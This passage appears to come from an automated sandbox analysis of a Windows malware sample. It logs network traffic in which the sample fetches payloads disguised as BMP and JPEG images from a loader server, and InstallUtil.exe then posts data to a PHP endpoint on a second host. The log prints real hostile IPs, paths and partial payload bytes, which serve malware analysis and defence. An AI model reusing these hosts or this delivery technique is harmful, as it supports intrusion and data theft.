                              May 27, 2022 13:23:20.156363964 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.176624060 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.176651001 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.176672935 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.176696062 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.176704884 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.176717043 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.176738024 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.176738977 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.176760912 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.176781893 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.176783085 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.176804066 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.176826000 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.176843882 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.176846981 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.176868916 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.176883936 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.176891088 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.176911116 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.176912069 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.176933050 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.176950932 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.176954985 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.176975965 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.176989079 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.176997900 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.177017927 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.177042007 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.177047968 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.177073956 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.196460009 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196507931 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196531057 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196552038 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196573973 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196594954 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196597099 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.196615934 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196636915 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196657896 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.196659088 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196681023 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196688890 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.196703911 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196715117 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.196724892 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196746111 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196767092 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196773052 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.196787119 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196799040 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.196808100 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196831942 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196852922 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196865082 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.196873903 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196893930 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196902990 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.196914911 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196935892 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196940899 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.196955919 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196976900 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.196980000 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.196997881 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.197017908 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.197041035 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.197041988 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.197062969 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.197073936 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.197083950 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.197103024 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.197105885 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.197125912 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.197146893 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.197158098 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.197168112 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.197187901 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.197196007 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.197210073 CEST80497183.124.188.36192.168.2.3
                              May 27, 2022 13:23:20.197226048 CEST4971880192.168.2.33.124.188.36
                              May 27, 2022 13:23:20.197230101 CEST80497183.124.188.36192.168.2.3
                              • 3.124.188.36
                              • 45.133.1.41
                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              0192.168.2.3497183.124.188.3680C:\Users\user\Desktop\TM57812337.exe
                              TimestampkBytes transferredDirectionData
                              May 27, 2022 13:23:20.135869026 CEST203OUTGET /bay/loader/uploads/TM57812337_Nbfpwrzt.bmp HTTP/1.1
                              Host: 3.124.188.36
                              Connection: Keep-Alive
                              May 27, 2022 13:23:20.156112909 CEST204INHTTP/1.1 200 OK
                              Date: Fri, 27 May 2022 11:23:20 GMT
                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                              Last-Modified: Thu, 26 May 2022 08:50:01 GMT
                              ETag: "5a200-5dfe646773433"
                              Accept-Ranges: bytes
                              Content-Length: 369152
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: image/bmp
                              Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 59 00 00 00 0c 00 05 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 38 00 32 00 31 00 32 00 2e 00 31 00 38 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 0f 00 46 00 00 00 00 00 38 00 38 00 32 00 31 00 32 00 2e 00 31 00 38 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 0f 00 42 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 6c 00 6c 00 64 00 2e 00 6b 00 72 00 77 00 69 00 69 00 65 00 5a 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 00 72 00 4f 00 01 00 0c 00 40 00 00 00 00 00 00 00 00 00 73 00 6b 00 72 00 61 00 6d 00 65 00 64 00 61 00 72 00 54 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 2a 00 00 00 00 00 00 00 74 00 68 00 67 00 69 00 72 00 79 00 70 00 6f 00 43 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 26 00 00 00 6c 00 6c 00 64 00 2e 00 6b 00 72 00 77 00 69 00
                              Data Ascii: 8Y88212.1818.0.1noisreV ylbmessAF88212.1818.0.1noisreVtcudorPBemaNtcudorP"lld.krwiieZemaneliFlanigirO@skramedarTlageL*thgirypoClageL&lld.krwi


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              1192.168.2.3497533.124.188.3680C:\Users\user\Desktop\TM57812337.exe
                              TimestampkBytes transferredDirectionData
                              May 27, 2022 13:23:59.405220985 CEST1530OUTGET /bay/loader/uploads/flip_Jozgxzue.jpg HTTP/1.1
                              Host: 3.124.188.36
                              Connection: Keep-Alive
                              May 27, 2022 13:24:02.571975946 CEST1591OUTGET /bay/loader/uploads/flip_Jozgxzue.jpg HTTP/1.1
                              Host: 3.124.188.36
                              Connection: Keep-Alive
                              May 27, 2022 13:24:02.592652082 CEST1592INHTTP/1.1 200 OK
                              Date: Fri, 27 May 2022 11:24:02 GMT
                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                              Last-Modified: Wed, 25 May 2022 23:04:39 GMT
                              ETag: "68a00-5dfde1908ab1e"
                              Accept-Ranges: bytes
                              Content-Length: 428544
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: image/jpeg
                              Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 06 00 00 00 0c 00 06 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 39 00 32 00 37 00 33 00 2e 00 31 00 38 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 0e 00 44 00 00 00 39 00 32 00 37 00 33 00 2e 00 31 00 38 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 0e 00 40 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 00 00 6c 00 6c 00 64 00 2e 00 72 00 73 00 70 00 7a 00 71 00 73 00 78 00 64 00 72 00 61 00 7a 00 63 00 62 00 67 00 77 00 4d 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 00 72 00 4f 00 01 00 15 00 52 00 00 00 00 00 00 00 00 00 73 00 6b 00 72 00 61 00 6d 00 65 00 64 00 61 00 72 00 54 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 2a 00 00 00 00 00 00 00 74 00 68 00 67 00 69 00 72 00 79 00 70 00 6f 00 43 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 26 00 00 00 00 00 6c 00 6c 00 64 00 2e 00 72 00 73 00 70 00 7a 00 71 00 73 00 78 00 64 00 72 00 61 00 7a
                              Data Ascii: 19273.1818.0.1noisreV ylbmessAD9273.1818.0.1noisreVtcudorP@emaNtcudorP"lld.rspzqsxdrazcbgwMemaneliFlanigirORskramedarTlageL*thgirypoClageL&lld.rspzqsxdraz


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              2192.168.2.3497613.124.188.3680C:\Users\user\Desktop\TM57812337.exe
                              TimestampkBytes transferredDirectionData
                              May 27, 2022 13:24:10.592638969 CEST2047OUTGET /bay/loader/uploads/TM57812337_Nbfpwrzt.bmp HTTP/1.1
                              Host: 3.124.188.36
                              Connection: Keep-Alive
                              May 27, 2022 13:24:10.612761974 CEST2048INHTTP/1.1 200 OK
                              Date: Fri, 27 May 2022 11:24:10 GMT
                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                              Last-Modified: Thu, 26 May 2022 08:50:01 GMT
                              ETag: "5a200-5dfe646773433"
                              Accept-Ranges: bytes
                              Content-Length: 369152
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: image/bmp
                              Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 59 00 00 00 0c 00 05 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 38 00 32 00 31 00 32 00 2e 00 31 00 38 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 0f 00 46 00 00 00 00 00 38 00 38 00 32 00 31 00 32 00 2e 00 31 00 38 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 0f 00 42 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 6c 00 6c 00 64 00 2e 00 6b 00 72 00 77 00 69 00 69 00 65 00 5a 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 00 72 00 4f 00 01 00 0c 00 40 00 00 00 00 00 00 00 00 00 73 00 6b 00 72 00 61 00 6d 00 65 00 64 00 61 00 72 00 54 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 2a 00 00 00 00 00 00 00 74 00 68 00 67 00 69 00 72 00 79 00 70 00 6f 00 43 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 26 00 00 00 6c 00 6c 00 64 00 2e 00 6b 00 72 00 77 00 69 00
                              Data Ascii: 8Y88212.1818.0.1noisreV ylbmessAF88212.1818.0.1noisreVtcudorPBemaNtcudorP"lld.krwiieZemaneliFlanigirO@skramedarTlageL*thgirypoClageL&lld.krwi


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              3192.168.2.3497623.124.188.3680C:\Users\user\Desktop\TM57812337.exe
                              TimestampkBytes transferredDirectionData
                              May 27, 2022 13:24:20.379992008 CEST2430OUTGET /bay/loader/uploads/TM57812337_Nbfpwrzt.bmp HTTP/1.1
                              Host: 3.124.188.36
                              Connection: Keep-Alive
                              May 27, 2022 13:24:20.400568962 CEST2432INHTTP/1.1 200 OK
                              Date: Fri, 27 May 2022 11:24:20 GMT
                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                              Last-Modified: Thu, 26 May 2022 08:50:01 GMT
                              ETag: "5a200-5dfe646773433"
                              Accept-Ranges: bytes
                              Content-Length: 369152
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: image/bmp
                              Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 59 00 00 00 0c 00 05 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 38 00 32 00 31 00 32 00 2e 00 31 00 38 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 0f 00 46 00 00 00 00 00 38 00 38 00 32 00 31 00 32 00 2e 00 31 00 38 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 0f 00 42 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 6c 00 6c 00 64 00 2e 00 6b 00 72 00 77 00 69 00 69 00 65 00 5a 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 00 72 00 4f 00 01 00 0c 00 40 00 00 00 00 00 00 00 00 00 73 00 6b 00 72 00 61 00 6d 00 65 00 64 00 61 00 72 00 54 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 2a 00 00 00 00 00 00 00 74 00 68 00 67 00 69 00 72 00 79 00 70 00 6f 00 43 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 26 00 00 00 6c 00 6c 00 64 00 2e 00 6b 00 72 00 77 00 69 00
                              Data Ascii: 8Y88212.1818.0.1noisreV ylbmessAF88212.1818.0.1noisreVtcudorPBemaNtcudorP"lld.krwiieZemaneliFlanigirO@skramedarTlageL*thgirypoClageL&lld.krwi


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              4192.168.2.34976345.133.1.4180C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              TimestampkBytes transferredDirectionData
                              May 27, 2022 13:24:39.113894939 CEST2814OUTPOST /jah/inc/9f3d37faadd0a5.php HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
                              Content-Type: application/x-www-form-urlencoded
                              Host: 45.133.1.41
                              Content-Length: 580
                              Expect: 100-continue
                              Connection: Keep-Alive
                              May 27, 2022 13:24:39.387582064 CEST2815OUTPOST /jah/inc/9f3d37faadd0a5.php HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
                              Content-Type: application/x-www-form-urlencoded
                              Host: 45.133.1.41
                              Content-Length: 580
                              Expect: 100-continue
                              Connection: Keep-Alive
                              May 27, 2022 13:24:39.887681007 CEST2816OUTPOST /jah/inc/9f3d37faadd0a5.php HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
                              Content-Type: application/x-www-form-urlencoded
                              Host: 45.133.1.41
                              Content-Length: 580
                              Expect: 100-continue
                              Connection: Keep-Alive
